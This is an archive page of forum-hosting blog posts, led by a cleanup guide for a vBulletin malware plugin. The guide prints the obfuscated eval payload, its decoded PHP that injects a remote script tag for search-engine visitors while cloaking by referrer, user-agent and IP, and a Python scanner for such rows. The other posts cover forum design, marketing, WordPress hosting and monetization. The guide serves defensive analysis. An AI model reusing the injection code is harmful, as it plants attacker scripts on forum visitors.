Archive For: July, 2012

Cleaning up vBulletin Script Injections

We’ve run across this hard-to-find script a few times in the past few weeks. The script sets conditions around specific referrers and user-agents. While it’s hard to find, the fix is simple.

It happens like this: a user comes to the forum from a Google search results page (SERP) and is greeted with this payload:
<script type="text/javascript" src="http://www.pixxxxoons.org/ijr.js

The script is loaded into vBulletin’s headinclude. Now for the fun part: a search of the files did not find it. A database restore won’t fix it, and searching for terms representative of encoded values (eval, base_64, etc.) came up blank too.

What happens is the malware rewrites the theme code itself, making detection difficult. We realized this was happening after finding that the site wasn’t responding to two scripts in the headinclude.

The fix is straightforward: the malware installs a plugin “vBulletin_hooks” and loads it globally. All that’s needed is to remove the plugin, reset datastores, and you are done.

If you’re a bit curious and want to check the entire process, start with checking inside the database.

Using phpMyAdmin, search the entire database for "%eval%".

That search should bring up several entries. We started with the datastore table (“eval” strings there load with the template), and there, we found this looking a bit odd:

$xhTuAS = “\x62?.”\x61?.”\x73?.”\x65?.@eval($xhTuAS(“DQpmdW5jdGlvbiBISGhwZ0h..
zY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiIHNyYz1cImh0dHA6Ly93d3cucGlzZXptYWt..
+PC9zY3JpcHQ+Iiwkb3V0cHV0KSk7DQp9DQpmdW5jdGlvbiB4ZnJFbHVhKCkgew0KaWYocHJlZ”));

After decoding, we found that it was up to this:

// Appends the remote script tag after a known marker in the rendered page
function HHhpgHoev($output) {
    $find_me = 'connection-min.js?v=387?>';
    return ($output = str_replace($find_me,$find_me."\r\n<script type=\"text/javascript\"
src=\"http://www.pisezmakoons.org/ijr.js? ",$output));
}
// True only when the referrer is a search engine and the user-agent is a listed browser
function xfrElua() {
    if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|…
',$_SERVER['HTTP_REFERER'])) {
        if(preg_match('#msie|myie|ie|firefox|opera|media center#i',$_SERVER['HTTP_USER_AGENT'])) return true;
    }
}
// True when the client IP starts with one of the listed prefixes
function kOBFvnrcO() {
    $a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.',…');
    foreach($a as $b) {
        if(preg_match("/^$b/i",$_SERVER['REMOTE_ADDR'])) return true;
    }
}
// Inject only for search-engine referrals whose IP is not on the prefix list
if(!empty($_SERVER['HTTP_REFERER'])) {
    if(xfrElua() and !kOBFvnrcO()) {
        $output = HHhpgHoev($output);
    }
}

You know the rest – a lot of work. Luckily, the fix was easy.

You know your site has the infection if you Google it, click on it from the Google search page, and it takes you back to the Google home page.
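Why the plain-text searches came up blank, shown as an added example that is not part of the original post: the decoder function's name is spelled with hex escapes, so a scanner has to decode those runs and the base64 argument before it can look for indicators. The sample rows, their keys and the injected.example URL are constructed for illustration.

```python
import base64
import binascii
import re

# A run of quoted hex escapes joined with PHP's "." operator: "\x62"."\x61"...
HEX_CONCAT = re.compile(r'(?:"(?:\\x[0-9a-fA-F]{2})+"\s*\.?\s*){2,}')
HEX_BYTE = re.compile(r'\\x([0-9a-fA-F]{2})')
# eval($var("<base64>")): a variable used as a function around a long literal
EVAL_VARCALL = re.compile(r'eval\s*\(\s*\$\w+\s*\(\s*"([A-Za-z0-9+/=\s]{16,})"')
SCRIPT_SRC = re.compile(r'src=\\?["\'](https?://[^"\'\\\s>]+)')
CLOAK_KEYS = ("HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR")


def hidden_names(text):
    """Decode every hex-escaped concatenation back to the string it spells."""
    return ["".join(chr(int(h, 16)) for h in HEX_BYTE.findall(m.group(0)))
            for m in HEX_CONCAT.finditer(text)]


def decode_payload(b64):
    """Best-effort base64 decode; tolerates line breaks and a truncated tail."""
    b64 = re.sub(r"\s+", "", b64)
    b64 = b64[:len(b64) - len(b64) % 4]
    try:
        return base64.b64decode(b64).decode("latin-1")
    except binascii.Error:
        return ""


def analyse_row(table, key, value):
    """Return a finding dict for an obfuscated eval row, or None if clean."""
    names = hidden_names(value)
    call = EVAL_VARCALL.search(value)
    if not names and not call:
        return None
    payload = decode_payload(call.group(1)) if call else ""
    return {"table": table, "key": key, "hidden_names": names,
            "script_urls": SCRIPT_SRC.findall(payload),
            "cloaking_keys": [k for k in CLOAK_KEYS if k in payload]}


def scan(rows):
    """Keep only the rows that produced a finding."""
    return [f for f in (analyse_row(*r) for r in rows) if f]


# --- constructed sample rows (table, key, value); not taken from a real site ---
_inert = '$o = "<script src=\\"http://injected.example/x.js\\"></script>"; $r = $_SERVER["HTTP_REFERER"];'
_name = ".".join('"\\x%02x"' % ord(c) for c in "base64_decode")
SAMPLE_ROWS = [
    # Benign row that a "%eval%" search also returns
    ("datastore", "options", 'a:1:{s:5:"title";s:22:"evaluation copy notice";}'),
    # Obfuscated row in the same shape as the entry found in the datastore table
    ("datastore", "pluginlist", "$xh = " + _name + ';@eval($xh("'
     + base64.b64encode(_inert.encode()).decode() + '"));'),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_ROWS):
        print(finding)
```

Feed it the rows that the "%eval%" search returns; anything it reports with a script URL or a cloaking key is worth tracing back to the plugin that wrote it.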

At URLJet, we offer professional, reliable managed forum hosting for some of the world’s largest forums, including Fortune 500 companies and even professional sports teams. vBulletin is all we do, all day, every day. Trust the vBulletin experts at URLJet to host your vBulletin forum. We guarantee we can run your forum faster, better, and more reliably than anyone… PERIOD! Email us at sales@urljet.com to get started!


Design Matters: Picking the Best vBulletin Layout for Your Site

Chances are you are just starting your vBulletin forum and one of the first things you will have to do is choose a layout. This may seem like a daunting task, but with a few tips you will feel more confident in your site.

When choosing a style for your site, you should choose something that is easy on the eyes. Pick colors that go together, look professional, and fit the time period. Also make sure the style is simple and the information is easy to find. Many people do not like searching and would rather click the back button on their browser than search your site.

With any forum, starting out you get to decide what categories you want for your forum. In addition to this, you will have a few members on your site. Keeping these two things in mind, you should limit the number of categories on your site. To encourage discussion and to turn visitors into members, you should keep them simple and broad. Doing this will keep your forum from looking empty and unappealing. Users go to these sites for discussion and to have their voice heard. If a site looks empty, they will end up going elsewhere. Once you gain members, you can then expand your site.

Finally, you should remember your site’s demographic and try to appeal to them. Think of categories your members would want to talk about. Look at other sites to gain ideas, but remember that you are just starting out, so naturally they will have more members and more categories than you. You can always ask other people in your demographic to see what they want to talk about. The answers may surprise you and could help determine your site layout.

While choosing the right site layout may be difficult, picking the right company to host your vBulletin community is easy. At URL Jet, we are the #1 high performance vBulletin hosting leader. Call us today at 1-888-699-2609 or visit our website, http://www.urljet.com/, to see the other services URL Jet can offer your business.


Forum Marketing: How-To

Marketing a business through online forums is a cost effective way to grow a business quickly and make it stand apart from the crowd. The people who frequent forums and message boards on the Internet today are generally very familiar with doing business on the web and it is not unusual for the users to be experts on the specific niche topics covered by a particular forum. This means that marketing your own business, product, service or website with forum marketing is a low-cost, high potential business strategy that can get your message out quickly and help your marketing efforts exponentially.

However, as good as online forums are today, not every forum in a particular niche will be worth investing your time in and this means it can be critically important to start with the right forum community for your specific niche business or interest. You can start your search using niche-specific keywords to locate the various online communities in your field that will be worth your time. You can narrow your list of potential targets by looking for forums that have at least 1,000 members and 10,000 existing posts. A good forum should also get a minimum of at least ten to fifteen new posts daily. Obviously, you don’t want to waste your time farming leads on a forum that is overrun by spam or hosted by a direct competitor to your own specific business.

One good strategy is to create your own forum account as soon as possible because users with older registration dates are usually given more privileges and access to more features than brand new members. You want to focus on becoming a participating member of the forums you plan to use as permanent marketing channels for your business, instead of just dropping in to push your latest advertising campaign.

It is also very important to check out the user agreements and posting guidelines of the forums you are interested in because they can affect your ability to market effectively. You will need to pay particular attention to whether or not users are allowed to place links in their posts to promote their own businesses. You will also need to know if users are allowed to post commercial messages or directly contact other forum members for commercial purposes.

Spend some time reading the forum in the beginning and try to resist the urge to start posting right away. Spend time reading the forum to get a sense of the community’s mentality and to determine who the most influential posters are and which specific topics generate the most interest. Many forums are tight communities and learning how a forum works up front will help you fit in more quickly and start making valuable contributions sooner. When you do make contributions, you should recognize that whenever someone posts a thread or asks a question related to your business products or services, the answers you supply are the key to successful forum marketing. Useful answers can help demonstrate your expertise and generate trust. When you back up your advice with useful related links and respond to follow up questions quickly, the entire forum community will come to regard you as an expert in your field. Take it easy on the strong opinions and sales pitches in the beginning and the level of trust will increase to the point where people will ask for your recommendations. When you start getting direct inquiries for recommendations is the right time to bring up your own products or business without appearing overly biased.

Once you have earned the trust of the forum users you can start more aggressive marketing campaigns, but don’t fall into the trap of loading a forum with spam messages. Forum spam might increase temporary traffic to your website or business, but it can also seriously damage your reputation in the long run. Ethical marketing practices that enhance your image will encourage far more forum users to learn more about your business than any amount of spam ever could. Starting slowly and learning all you can about your target forum before you start posting will allow you to take full advantage of the true potential and help you create a low-cost, high-yield marketing strategy that really works on the Internet today.


WordPress Hosting for High Traffic Sites

WordPress is a good choice of platform to host a high-traffic website or blog because it was designed to be able to handle large amounts of traffic from the start. However, you will need to make sure your web server, caching system, and file sizes are actually able to handle high traffic volume. WordPress can handle only as much traffic as can be supported by the hardware it runs on and the two main obstacles to handling large volumes of traffic are processor limitations and network limitations. The processor limitations show up when a website’s traffic puts high demands on a server’s processor power and memory resources. The WordPress application depends on MySQL to store data for producing output and each request that WordPress makes to MySQL for data creates additional loads on the server. Although WordPress is optimized to reduce the number of different actions required to perform its functions, the plug-ins or themes you use in the WordPress installation can also affect the reliance on MySQL.

When traffic to a site is extremely high, the number of simultaneous connections to the database puts a big load on the server and some connections may not go through and will result in the “connection timed out” display on a visitor’s browser. Because WordPress is a web-server-neutral application, it can run on several different platforms, including Apache and Linux, but any server that fully supports PHP and MySQL can get the job done. As PHP interprets the WordPress code, it can also affect your server’s performance when it creates a new version of the PHP program for every PHP file that a visitor requests. This means you need to be aware of the demands traffic puts on your server. Network limitations become a factor when a server’s connection to the Internet is too slow to serve up the pages you want as fast as you like. Because your server’s network provider connects to their internal network with an Ethernet adapter at a specific designated speed (usually 10Mb/s, 100Mb/s, or 1Gb/s) the server cannot transfer files any faster than that speed. Actually, a server cannot really even transfer files at the maximum rate specified by the adapter because the server is constantly sending and receiving routing information and only part of the full bandwidth is actually available for transferring files. Because your network provider has limited bandwidth that must be shared, your network provider’s capabilities will limit transfer speeds more than the server’s network adapter.

Some network providers also offer the ability to handle bursts of data that can temporarily exceed pre-set transfer speed limits in instances when demand is the highest. The bandwidth of a connection is important to high-traffic sites because if just one dozen people hit a site at the same time, and that rate is sustained over time, a site would need at least a 15Mb/s connection to keep up. The bandwidth of the connection is important to any high-traffic website because an adapter with a maximum speed of just 10Mb/s could be overwhelmed by just one dozen sustained visitors. You don’t have to receive 100,000 hits a day to cause problems either. If your visitors concentrate access to a particular time of day or automated spam tries to access your system multiple times, it could result in many dropped requests. A 100Mb/s connection could handle very high rates of simultaneous traffic, but most network providers won’t offer that level of speed without extra fees, and most current shared hosting plans like WordPress don’t offer it at all. Most hosting services provide a fixed amount of overall transfer and if your account goes over the limit, you will get charged for the extra data transferred. The general rule is that the higher the transfer limit is, the more your hosting plan will cost. There are hosting services that do offer unlimited data transfer plans, but they will obviously cost a lot more, although maybe not as much as paying for transfer overages on a high-traffic site.

One way to optimize the performance of your high traffic website and avoid extra transfer charges is to use a Content Delivery Network in conjunction with your site that will help you avoid expensive overages and the bandwidth limitations imposed by some of the more popular hosting providers. In the end, your server is only as capable as your network provider is, and if your provider cannot provide the bandwidth you need, you have two options. You can try to negotiate a better price for increased bandwidth, or you can simply find a different provider that does provide the resources your high traffic site requires.


Monetizing Forums

Monetizing Your Forum
Forums and message boards have become a big part of the Internet over the last decade and today you can find thousands of different groups gathered to share the latest info on just about any niche topic, passion or pursuit you can think of. The power and global reach of the Internet has made it easier than ever before for like-minded people to get together and thoroughly explore the products, people, places and things that interest them the most.

Although many forums have been born out of a passion for a particular subject or topic, it takes more than passion alone to keep a site up and running actively on the web these days. If you’re a forum owner, you know that it costs money and takes time to run a successful forum. If you’re independently wealthy, or just feel like operating your forum at a loss due to your enthusiasm for a certain niche, that’s fine. However, in the real world most forum owners need a way to recoup their expenses and cover the time spent managing their forums.

Fortunately, there are now a number of different ways forum owners can cover their operating costs and even make a profit in many cases:

  • Paid memberships – Paid memberships can generate income from a two-tiered content system when a forum has good enough free content to attract new members and a level of even better content available only to the paid members. The object is to convert the free visitors into premium or paid members as quickly as possible.
  • Advertising Networks – Advertising networks like Google’s Adsense and the Yahoo! publisher networks are some of the most direct and proven ways to monetize a forum. VigLink is another way of monetizing content with links from targeted content to advertisers. Most forums deal with specific niches and there are many smaller ad networks that serve these targeted niches. The trick is finding the one best suited to your users’ needs. Income is earned whenever forum visitors click on the rotating ads that are supplied and maintained by the advertiser network. Depending on a forum’s specific focus, third-party ads alone can often generate enough income to maintain a forum.
  • Advertising – You can sell direct ad space on a forum to potential advertisers that are related in any way to the specific content on your site. There are also programs like OpenX available that will allow you to sell advertisements for specific geographic regions too. Remember that selling ad space also comes along with account management duties like maintaining ad inventory; chasing down late payments; and uploading new ads.
  • Sponsors – Sometimes specific companies with products related to your forum will step up and sponsor your site. Enticements could include “sponsored by” banners, product prizes or even new forum threads dedicated to discussing a company’s product.
  • Affiliates – As an alternative to direct advertising, forums can carry advertisements for affiliate programs that are relevant to the forum and can be worked into the discussion threads. Companies or other sites selling products related to a forum niche like books and DVDs are always good potential affiliates.
  • Donations – Sites without a lot of advertising on them can ask for donations after they explain what good purpose or cause the money will be used for. Although most donations are usually simply used to run a forum, visitors that do donate can be given special privileges or access to specific content similar to a paid membership in order to sweeten the deal. A Paypal donation button on the site can be a very useful tool when asking for donations.
  • Product Sales – Although direct product sales come along with the duties of maintaining inventory, collecting payments and shipping, selling products with a shopping cart plug-in on your site can be an effective alternative to affiliate programs or direct ad sales.
  • Classified Ads – Some of the larger, product-oriented niche forums have had good success with classified advertising sections onsite. If enough members will pay a small fee to advertise their stuff for sale or trade on your site, it can generate significant income.
  • Sell Links – Forum owners can always offer links to other sites for a fee. Third party link brokers like Text Link Ads will handle the details if you wish, or you can sell the links by yourself, and collect the payments and insert the links on your own.

Some methods of monetizing a forum obviously require more work than others. Collecting donations, working with affiliates and hosting Adsense ads are all fairly passive methods of generating cash. Direct advertising or direct product sales are more active methods that will require a bit more work. However, in the end, the methods of monetization you eventually choose will probably depend on the traffic your site gets and the niche it is in.
